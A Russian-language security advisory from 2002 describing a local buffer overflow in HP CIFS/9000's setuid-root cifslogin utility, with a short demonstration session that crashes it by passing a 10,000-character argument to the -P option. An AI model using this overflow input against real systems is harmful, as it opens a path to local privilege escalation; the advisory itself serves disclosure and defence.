Переполнение буфера в cifslogin

Дата публикации:
26.06.2002
Всего просмотров:
748
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в утилите /opt/cifsclient/bin/cifslogin, поставляемой с CIFS/9000.

Длинные аргументы командной строки '-U', '-D', '-P', '-S', '-N', и '-u' приводят к переполнению буфера. Уязвимость может использоваться местным пользователем для поднятия привилегий.

Уязвимость обнаружена в HP CIFS/9000 Server A.01.06

Пример:

$ id
uid=110(alex) gid=102(informix)
$

$ uname -a
HP-UX Lab02 B.11.11 U 9000/800 1613339393 unlimited-user license $

$ ls -la /opt/cifsclient/bin/cifslogin
-rwsr-xr-x 1 root users 53248 Mar 28 2001 /opt/cifsclient/bin/cifslogin

$ /opt/cifsclient/bin/cifslogin -P `perl -e '{print "A"x10000}'` Memory fault


Ссылки: Sharity Cifslogin Buffer Overflow (Arguments)
или введите имя

CAPTCHA